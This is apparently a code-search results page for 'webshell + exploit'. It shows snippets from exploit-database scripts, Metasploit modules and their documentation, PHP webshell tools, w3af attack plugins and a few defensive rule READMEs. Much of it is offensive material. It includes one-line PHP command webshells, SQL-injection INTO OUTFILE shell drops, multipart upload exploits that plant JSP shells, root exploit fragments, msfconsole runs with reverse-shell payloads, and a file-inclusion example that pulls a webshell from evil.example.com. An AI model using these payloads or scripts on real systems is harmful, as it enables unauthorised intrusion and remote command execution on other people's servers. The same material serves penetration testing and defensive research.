50+ results for 'webshell + exploit' (147 ms)
#!/usr/bin/python
# Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit
# greetz Tecr0C :0)
...
#
# exploit includes:
# - Proxy support
...
# | -------------------------------------------- |
# | Lotus CMS v3.0 Remote Code Execution Exploit |
# | by mr_me - net-ninja.net ------------------- |
#
# (+) Exploiting target @: 192.168.56.101/webapps/lotus/lcms/
# (+) Testing proxy @ localhost:8080.. proxy is found to be working!
...
# (+) Writing comment.. comment shell written sucessfully
# (+) Writing webshell d8e8fca2dc0f896fd7cb4cb0031ba249.php to the webroot..
# (+) Entering interactive remote console (q for quit)

caidao_php_backdoor_exec.rb https://gitlab.com/alx741/metasploit-framework | Ruby | 72 lines
class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
...
      'Description' => %q{
        This module takes advantage of the China Chopper Webshell that is
        commonly used by Chinese hackers.
...
          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
          ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
          ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A']
...
    if res && res.body =~ /#{flag}/m
      Exploit::CheckCode::Vulnerable
    else

README.md https://gitlab.com/MisterCh0c1/fuzzdb | Markdown | 92 lines
**Attack Patterns -**
Categorized by platform, language, and attack type, malicious and malformed inputs known to cause information leakage and exploitation have been collected into sets of test cases.
FuzzDB contains comprehensive lists of [attack payloads](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack-payloads) known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, http header crlf injections, and more.
...
**Other useful stuff -**
Webshells, common password and username lists, and some handy wordlists.
(https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors) etc etc etc
...
 * analysis of error messages
 * researching old web exploits for repeatable attack strings
 * scraping scanner payloads from http logs
...
 * in training materials and documentation
 * to learn about software exploitation techniques

caidao_php_backdoor_exec.rb https://gitlab.com/0072016/metasploit-framework-rapid7 | Ruby | 72 lines
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
...
      'Description' => %q{
        This module takes advantage of the China Chopper Webshell that is
        commonly used by Chinese hackers.
...
          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
          ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
          ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A']
...
    if res && res.body =~ /#{flag}/m
      Exploit::CheckCode::Vulnerable
    else

emelco-1.2.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1457 lines
 EMelCo PHP WebShell v1.2
 Written by >> s E t H <<
...
 [+] Change leerarchivo() to use shell() with cat
 [+] Add root exploits
 [+] Add PHP exploits
...
$nombre = 'EMeLCo WebShell v1.2';

emelco-1.4.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1800 lines
 EMelCo PHP WebShell v1.4
 Written by >> s E t H <<
...
 [!] Fixed a bug in the chmod form
 [!] If the PHP version is not affected by the bug, the checkbox for the ini_restore exploit is not shown
 [+] Function to delete itself
...
 [!] Remove the messages "Cannot read /var/log/messages because it exceeds 50000 bytes", or show them as a link
 [+] Add root exploits
 [+] Add PHP exploits
...
$nombre = 'EMeLCo WebShell v1.4';

emelco-1.3.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1808 lines
 EMelCo PHP WebShell v1.3
 Written by >> s E t H <<
...
 [!] Remove the messages "Cannot read /var/log/messages because it exceeds 50000 bytes", or show them as a link
 [+] Add root exploits
 [+] Add PHP exploits
...
$nombre = 'EMeLCo WebShell v1.3';

25606.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 92 lines
# Exploit Title: Kimai 0.9.2.1306-3 SQLi
# Date: 05/20/2013
# Exploit Author: drone (@dronesec)
# Vendor Homepage: http://www.kimai.org/
...
def webshell(options, id):
    """ dat webshell
...
    if options.shell:
        return webshell(options, id)

34431.html https://bitbucket.org/DinoRex99/exploit-database.git | HTML | 142 lines
Successful exploit requires that the 'nagiosadmin' be logged into the web interface.

Attackers can exploit these issues to gain unauthorized access to the affected application and perform certain administrative actions.
...
Modify nagios command to create a webshell when run

24359.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 119 lines
Successful exploitation of this issue may allow an attacker to execute malicious script code on a vulnerable server.
...
    YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
    This Proof of Concept creates a small webshell script in the server
    that we can use to exec commands in the server.
...
    Then creates a crafted comment saved in a new .php file. This comment
    contains an encoded webshell. Once this .php file is opened, the code
    contained creates acidwebshell.php.
...
/* This is my webshell script generator. It contains the webshell encoded
   to avoid magic_quotes and urldecode altering the content of the script. */
...
echo "[+] Creating WebShell Script ... ";

20342.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 248 lines
/*
# Exploit Title: WespaJuris <= 3.0 auto exploit
# Date: 07th august 2012
...
Use this exploit to upload a webshell on vulnerable applications.
Usage:
...
 [!] Exploit complete.
 [i] You have now a webshell in <http://localhost/juris/clientdir/30/dl/webshell.php>

Then, go to http://localhost/juris/clientdir/30/dl/webshell.php and see your webshell.

:: How this exploit works? Manually work.

8765.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 97 lines
print_r('
******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ********
...
    sent($sock);
    echo "Be cool,man! Webshell is http://".$host.$path."racle.asp";
    die;}

nagios_xi_autodiscovery_webshell.md https://github.com/rapid7/metasploit-framework.git | Markdown | 226 lines
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set target 0
target => 0
...
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DELETE_WEBSHELL false
DELETE_WEBSHELL => false
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set WEBSHELL_NAME lobster.php
WEBSHELL_NAME => lobster.php
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

18266.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 282 lines
#
# Exploit requirement:
# --------------------
...
# +==============================================================================================+
# | Open Conference/Journal/Harvester Systems <= 2.3.X csrf/upload/remote code execution exploit |
# | Found by: mr_me                                                                              |
...
#
# (+) Exploit sent to the client target 127.0.0.1 attacking 192.168.220.134.
# (-) Code injection and execution failed!
...
#
# (+) Exploit sent to the client target 127.0.0.1 attacking 192.168.220.134.
# (!) Code injection worked!
# (!) Launching webshell..!
#

pfsense_diag_routes_webshell.md https://github.com/rapid7/metasploit-framework.git | Markdown | 162 lines
* Follow the installation instructions above
* Do: `use exploit/unix/http/pfsense_diag_routes_webshell`
* Do: `set username <name>`
...
[*] Using configured payload bsd/x64/shell_reverse_tcp
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set USERNAME diag_only
USERNAME => diag_only
...
USERNAME => diag_only
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
...
RHOST => 10.0.0.10
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > check

...
[+] 10.0.0.10:80 - The target is vulnerable.
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set LHOST 10.0.0.2
LHOST => 10.0.0.2

16980.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 153 lines
# ~INFORMATION
# Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
# Author: TecR0c
...
|----------------------------------------|
|Exploit: If-CMS 2.07 LFI RCE
|Author: %s
...
def postRequestWebShell(encodedCommand):
    webSiteUrl = url.geturl()+'.shell.php'
...
        encodedCommand = base64.b64encode(command)
        response = postRequestWebShell(encodedCommand)
        print response
...
    encodedCommand = base64.b64encode('rm .shell.php')
    postRequestWebShell(encodedCommand)
    print "\n[!] Removed .shell.php\n"

nagios_xi_magpie_debug.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 246 lines
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  prepend Msf::Exploit::Remote::AutoCheck

...
      'Description' => %q{
        This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
        CVE-2018-15708 which allows for unauthenticated remote code execution

make_deb.sh https://bitbucket.org/jarrettchisholm/oscar.git | Shell | 484 lines
# v 24 - Updated reOscar to reOscar2.sh, added ichppccode table, missing HRMDocuments column and many indices to patch.sql
# v 25 - More indices added to patch.sql and web.xml added to OscarDocuments and moved OscarDocuments to prevent webshell exploit
# v 26 - Updated Rich Text Letter and moved OscarDocuments to prevent webshell exploit

39982.rb https://bitbucket.org/DinoRex99/exploit-database.git | Ruby | 69 lines
# Exploit Title: Airia - Webshell Upload Vulnerability
# Date: 2016-06-20
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
...
if ARGV.length !=2
puts "Airia Webshell Upload Exploit(Vulnerability)"
puts "Usage: #>ruby airia_ws_exploit.rb [targetURL] [phpCode]"
...
puts " Example : ~~.rb http://127.0.0.1/vul_test/airia 'echo zzzz'"
puts " exploit & code by hahwul[www.hahwul.com]"

...
request["Content-Type"] = "application/x-www-form-urlencoded"
request.set_form_data({"mode"=>"save",""=>"","file"=>"shell.php","scrollvalue"=>"","contents"=>"<?php echo 'Airia Webshell Exploit';#{shell};?>","group"=>"vvv_html"})
response = http.request(request)
...
output: Airia Webshell Exploit123

19007.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 126 lines
<?php
# Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection
# Exploit Author: WhiteCollarGroup
...
 ~> SQL Injection
This exploit is for a vulnerability in ler.php, but the same vulnerability exists in imprimir.php and imagem.php.
ler.php?id=[SQLi]
...
    After opening the administration panel, try to add a new article.
    Use the upload form to upload your webshell.
    After posting, access:
...
echo "PHPNet <= 1.8 SQLi Exploit\n";
echo "Discovered by WhiteCollarGroup\n";
...
    if($i==0) {
        echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry.";
    } else {

36202.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 330 lines
# Seagate Business NAS pre-authentication remote code execution
# exploit as root user.
#
...
# - -c : (optional) create a cookie which will give admin access.
#        Not specifying this flag results in webshell installation.
# - ua : (optional) the user agent used by the browser for the
...
hostname = ''
webshell = str(uuid.uuid1()) + ".php"

...
    url = 'http://{0}:{1}/{2}'.format(host, port, webshell)
    req = urllib2.Request(url, headers = headers, data = post_data)
...
    print ""
    print "Seagape v1.0 -- Interactive Seagate NAS Webshell"
    print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/"

caidao_php_backdoor_exec.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 69 lines
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
...
      'Description' => %q{
        This module takes advantage of the China Chopper Webshell that is
        commonly used by Chinese hackers.
...
          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
          ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-313A']
...
    if res && res.body =~ /#{flag}/m
      Exploit::CheckCode::Vulnerable
    else

17003.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 202 lines
# ~INFORMATION
# Exploit Title: iCMS v1.1 Admin SQLi/bruteforce Exploit
# Author: TecR0c
...
sitePath = '/var/www/iCMS/icms/'
webshell = '<?php+system(base64_decode($_REQUEST[cmd]));?>'

...
|----------------------------------------|
|Exploit: iCMS SQLi RCE
|Author: %s
...
        "admin/item_detail.php?id=1+UNION+SELECT+NULL,'TECR0CSHELL"\
        +webshell+"LLEHSC0RCET'+INTO+OUTFILE+'"+sitePath+".webshell.php'"
        opener.open(webSiteUrl)
        print '[+] Wrote WEBSHELL !'
    else:

44825.html https://bitbucket.org/DinoRex99/exploit-database.git | HTML | 33 lines
# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell
# Date: 2018-06-02
# Exploit Author: xichao
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS
...
      <input type="hidden" name="content" value="<?php phpinfo();?>">
      <button type="submit" value="Submit">WebShell</button>
    </form>

22128.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 239 lines
A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun.
...
/*
 * Local r00t exploit for Webshell 2.4 (possibly other versions).
 * Vulnerability found and exploit written by Carl Livitt
...
#define SHELLSCRIPT_FILE "/tmp/zz"
#define EXPLOIT_FILE "/tmp/.webshell.txt"
#define ROOT_SHELL "/tmp/rs"
...
    if((pid=fork())==0) {
        system(WEBSHELL_PROGRAM" < "EXPLOIT_FILE" &>/dev/null");
        exit(0);
...
    if((fp=fopen(EXPLOIT_FILE,"w"))==NULL) {
        printf("Could not create exploit file %s\n", EXPLOIT_FILE);
        exit(1);

22454.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 339 lines
    }
    send(websock, exploit_buf, strlen(exploit_buf), 0);
    //len=recv(websock, buf, sizeof(buf)-1, 0);
...
    sprintf(exploit_buf,"GET %s HTTP/1.1\n",location);
    sprintf(exploit_buf,"%sHost: %s\n",exploit_buf,target);
    sprintf(exploit_buf,"%sAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\n", exploit_buf);
    sprintf(exploit_buf,"%sAccept-Language: en-gb, en;q=0.66, en-us;q=0.33\n", exploit_buf);
    sprintf(exploit_buf,"%sAccept-Encoding: gzip, deflate, compress;q=0.9\n", exploit_buf);
    sprintf(exploit_buf,"%sAccept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66\n", exploit_buf);
    sprintf(exploit_buf,"%sCookie: ck_ams=00000; ck_amsv=11043763620; ck_sid=3J4EUD0l4Juf1ev-06103517452.aa\n", exploit_buf);
    sprintf(exploit_buf,"%sAccept-Encoding: %s\n\n",exploit_buf, sc);
    //printf("%s\n\n", exploit_buf);

dlink_central_wifimanager_sqli.md https://github.com/rapid7/metasploit-framework.git | Markdown | 180 lines
This module exploits a vulnerability in Dlink Central
WifiManager (CWM-100), found in versions lower than
...
- set action ...
- `check` or `exploit`
- should work as in the scenarios below
...
(copy ... to ...), but using full paths, the attacker must know the path of the webroot
to upload a webshell this way.

19060.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 132 lines
<?php
# Exploit Title: TheBlog <= 2.0 SQL Injection
# Exploit author: WhiteCollarGroup
...
    After getting admin access, on the menu, click "Upload".
    Upload your webshell on the form. A link will appear in the file list ("Lista de Arquivos").

    > What's this exploit?
    It is a PoC for SQL Injection on "index.php?id=".
    How to use:
    php exploit.php <target>
    Example:
    php exploit.php http://target.com/blog/

lrfi.html https://bitbucket.org/rmusser/infosec-reference.git | HTML | 186 lines
    <br />
    /vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
    <br />
...
    <br />
    /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
    <br />
    Executes code from an already uploaded file called exploit.php (local
    file inclusion vulnerability)
...
    <li>
      <a href="http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/">
        Exploiting PHP File Inclusion – Overview « Reiners’ Weblog

zimbra_xxe_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 48 lines
This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the ClientUploader is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
...
1. `./msfconsole -q`
2. `use exploit/linux/http/zimbra_xxe_rce`
3. `set rhosts <rhost>`
4. `set lhost <lhost>`
5. `exploit`
...
msf5 exploit(linux/http/zimbra_xxe_rce) > exploit

shopware_createinstancefromnamedarguments_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 283 lines
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
...
      'Description' => %q(
        This module exploits a php object instantiation vulnerability that can lead to RCE in
        Shopware. An authenticated backend user could exploit the vulnerability.
...
        An attacker can leverage this to deserialize an arbitrary payload and write a webshell to
        the target system, resulting in remote code execution.
...
          ['CVE', '2017-18357'], # not really because we bypassed this patch
          ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/'] # initial writeup w/ limited exploitation
        ],

pfsense_diag_routes_webshell.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 227 lines
        OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),
        OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])
      ]
...
  def drop_webshell
    webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")
    print_status("Uploading webshell to #{webshell_location}")
...
    if datastore['DELETE_WEBSHELL']
      register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")
    end
...
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}"),
      'vars_get' => {
...
    # create a randomish web shell name if the user doesn't specify one
    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"

22129.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 325 lines
/*
 * Remote r00t exploit for Webshell 2.4 (possibly other versions).
 * Vulnerability found and exploit written by Carl Livitt
...
gcc -o webshell-remote webshell-remote.c
./webshell-remote -t www.host-to-exploit.com -l /path/to/webshell

...
"-P port      Port to bind shell on remote host [10000]\n"
"-l location  Location of webshell (eg. /cgi-bin/webshell)\n\n"
"Example:\n\n"
...
    sprintf(exploit_buf,"%sAccept-Encoding: %s\n",exploit_buf, sc);
    sprintf(exploit_buf,"%s%s\n",exploit_buf,egg);
    sprintf(exploit_buf,"%sContent-Length: %d\n\n",exploit_buf,EGG_SIZE*2);
    sprintf(exploit_buf,"%s--%s\n",exploit_buf, egg+CONTENT_LENGTH);
    sprintf(exploit_buf,"%sContent-Disposition: form-data; name=\"TESTNAME\"; filename=\"TESTFILENAME\"\r\n\r\n",exploit_buf);
    sprintf(exploit_buf,"%s%-*s\n",exploit_buf, EGG_SIZE*4," ");

9556.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 37 lines
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
...
Gr44tz to q1ur3n, puret_t, uk, toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
...
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

nagios_xi_autodiscovery_webshell.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 238 lines
        OptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]),
        OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),
        OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])
...
    # drop a basic web shell on the server
    webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")
    print_status("Uploading webshell to #{webshell_location}")
...
    if datastore['DELETE_WEBSHELL']
      register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")
    end
...
        'mode' => 'deletejob',
        'job' => "#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}"
      }
...
    # create a randomish web shell name if the user doesn't specify one
    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"

rce_check.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 93 lines
      if version < Rex::Version.new(fixed_version)
        matching_exploits = add_cve_module_to_hash(matching_exploits, info)
      end
...
      if version == Rex::Version.new(fixed_version)
        matching_exploits = add_cve_module_to_hash(matching_exploits, info)
      end
...
      if version >= lower && version <= higher
        matching_exploits = add_cve_module_to_hash(matching_exploits, info)
      end
...
  #
  # @param matching_exploits [Hash] maps CVE numbers to exploit module names
  # @param cve_module_array [Array] contains arrays with a CVE number at index 0 and a matching exploit at index 1
  # @return [Hash] updated list of matching exploits, mapping CVE numbers to exploit module names
  def add_cve_module_to_hash(matching_exploits, cve_module_array)

17510.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 91 lines
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo<wofeiwo@80sec.com>
...
    print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
execute exploit"
    print "Usage: %s <PMA_url>" % program
...
    # [garbled comment] setup ... shell
    print "[+] Trying get webshell.."
    postdata =
...
    else:
        print "[-] Cannot get webshell."

39691.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 105 lines
# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
# Exploit Author: Zhou Yu <504137480@qq.com >
...
webshell_content='''
<%@ page import="java.util.*,java.io.*" %>
...
post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
post_data = post_data + "\r\nwebshell.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
...
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
post_data = post_data + "Content-Type: text/plain\r\n"
post_data = post_data + "\r\n" + webshell_content +"\r\n"
post_data = post_data + "--" + boundary + "\r\n"
...
    print "[+]upload done!"
    webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
    print "[+]wait a moment,detecting whether the webshell exists..."

exchange_proxyshell_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 142 lines
    1. If no email address is specified
        1. The exploit will leverage the SSRF to issue a request to EWS and enumerate the email addresses
            * This technique was taken from [dmassland/proxyshell-poc](https://github.com/dmaasland/proxyshell-poc/blob/main/proxyshell-enumerate.py)
...
    * Email addresses are mapped to SIDs using a request to autodiscover and MAPI
1. A draft email is saved to the identified user's mailbox containing an encoded webshell embedded within an attachment
1. The `New-MailboxExportRequest` cmdlet is used to export the attachment and write the webshell to an accessible location
1. The exploit waits for the webshell to be written and uses it to execute OS commands
1. The webshell*, export request and draft email are all removed
...
msf6 > use exploit/windows/http/exchange_proxyshell_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
...
[+] 192.168.159.42:443 - The target is vulnerable.
msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit

zimbra_xxe_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 258 lines
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FileDropper

...
      'Description' => %q{
        This module exploits an XML external entity vulnerability and a
        server side request forgery to get unauthenticated code execution
...
        cookie. After gaining an admin cookie the Client Upload servlet is
        used to upload a JSP webshell that can be triggered from the web
        server to get command execution on the host. The issues reportedly

vmware_vcenter_uploadova_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 179 lines
Note that later vulnerable versions of the Linux appliance aren't
exploitable via the webshell technique. Furthermore, writing an SSH
public key to `/home/vsphere-ui/.ssh/authorized_keys` works, but the
...
patched. Later vulnerable versions of the Linux appliance aren't
exploitable via the webshell technique. I haven't been able to download
and test them all. Sorry.
...
msf6 > use exploit/multi/http/vmware_vcenter_uploadova_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > options

...
Exploit target:

vmware_vcenter_uploadova_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 236 lines
class MetasploitModule < Msf::Exploit::Remote

...
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::CheckModule
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
...
      'Description' => %q{
        This module exploits an unauthenticated OVA file upload and path
        traversal in VMware vCenter Server to write a JSP payload to a
...
        Note that later vulnerable versions of the Linux appliance aren't
        exploitable via the webshell technique. Furthermore, writing an SSH
        public key to /home/vsphere-ui/.ssh/authorized_keys works, but the

caidao_php_backdoor_exec.md https://bitbucket.org/DinoRex99/metasploit-framework.git | Markdown | 44 lines
China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.

...
 2. Start msfconsole
 3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
 4. Do: `set rport port`
...
 8. Do: `exploit`
 9. You should get a shell.
...
msf exploit(caidao_php_backdoor_exec) > exploit

shell_handler.py https://github.com/andresriancho/w3af.git | Python | 171 lines
def get_webshells(extension, force_extension=False):
    """
    This method returns a webshell content to be used in exploits, based on
    the extension, or based on the x-powered-by header.
...
    """
    return _get_file_list('webshell', extension, force_extension)

...
    """
    Similar to get_webshells but returns a code that when it is evaluated runs
    `command` in the operating system.
...
    Example:
        get_webshells() returns:
            "<? system( $_GET['cmd'] ) ?>"

dav.py https://github.com/andresriancho/w3af.git | Python | 191 lines
        Then the exploit plugin that exploits os_commanding
        ( attack.os_commanding ) should return 'os_commanding' in this method.
...
        om.out.debug(msg)
        self._exploit_url = exploit_url
        return True
...
        :return: This method returns the probability of getting a root shell
                 using this attack plugin. This is used by the "exploit *"
                 function to order the plugins and first try to exploit the
                 more critical ones. This method should return 0 for an exploit
                 that will never return a root shell, and 1 for an exploit that
...
        self.exploit_url = exploit_url

nagios_xi_magpie_debug.md https://github.com/rapid7/metasploit-framework.git | Markdown | 100 lines
This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
CVE-2018-15708 which allows for unauthenticated remote code execution
...
The exploit works as follows:

...
  - The `RSRVHOST` and `RSRVPORT` options are used to specify the HTTPS server host and port.
- A PHP webshell and payload executable are uploaded via `magpie_debug.php`.
- A command is executed via the webshell. This command elevates privileges and runs the payload executable.
...
1. `msfconsole`
1. `use exploit/linux/http/nagios_xi_magpie_debug`
1. `set RHOSTS [IP]`
1. `set RSRVHOST [IP]`
1. `exploit`
1. You should get a new session with *root* privileges

file_upload.py https://github.com/andresriancho/w3af.git | Python | 224 lines
        Then the exploit plugin that exploits os_commanding
        ( attack.os_commanding ) should return 'os_commanding' in this method.
...
        if exploit_url is not None:

...
            if shell_handler.SHELL_IDENTIFIER in response.get_body():
                return exploit_url

...
        for shell_str, orig_extension in shell_handler.get_webshells(extension):
            # If the webshell was webshell.php this will return a file_name
            # containing kgiwjxh.php (8 rand and the extension)
...
        self._exploit_url = exploit_url

...
        """
        return self.__class__, (self._vuln, None, None, self._exploit_url)

README.md https://bitbucket.org/lazy_dogtown/doxi-rules.git | Markdown | 99 lines
hint for hacked / misused / C&C-servers and tries to detect
web-backdoors, webshells and other malicious access to unwanted
files/services.
...
- detect exploit/misuse-attempts against web-applications; please see
scanner.rules for some details on webapp-based scanners
...
- generic rules to protect a webserver from misconfiguration
and known mistakes / exploit-vectors

test_shell_handler.py https://github.com/andresriancho/w3af.git | Python | 119 lines
from w3af.plugins.attack.payloads.shell_handler import (get_webshells,
                                                         get_shell_code)
...
    def test_get_web_shell_extension(self):
        shells = get_webshells('php')

...
    def test_get_web_shell_code_extension_force(self):
        shells = get_webshells('php', True)

...
    def test_get_web_shell_code_no_extension(self):
        shells = get_webshells('')

...
    def test_get_web_shell_code_invalid_extension(self):
        shells = get_webshells('123456')

2020-09-19-sedna-vulnhub.md https://github.com/wulfgarpro/wulfgarpro.github.io.git | Markdown | 193 lines
Download the non-Metasploit PoC with EDB-ID [40390](https://www.exploit-db.com/exploits/40390):
...
Copy _/usr/share/webshells/php/php-reverse-shell.php_ from Kali's bundled webshells and update the connect back IP address/port to be the attacking IP address/port:

![php-webshell](/images/posts/penlog_sedna_by_vulnhub/php_webshell.png)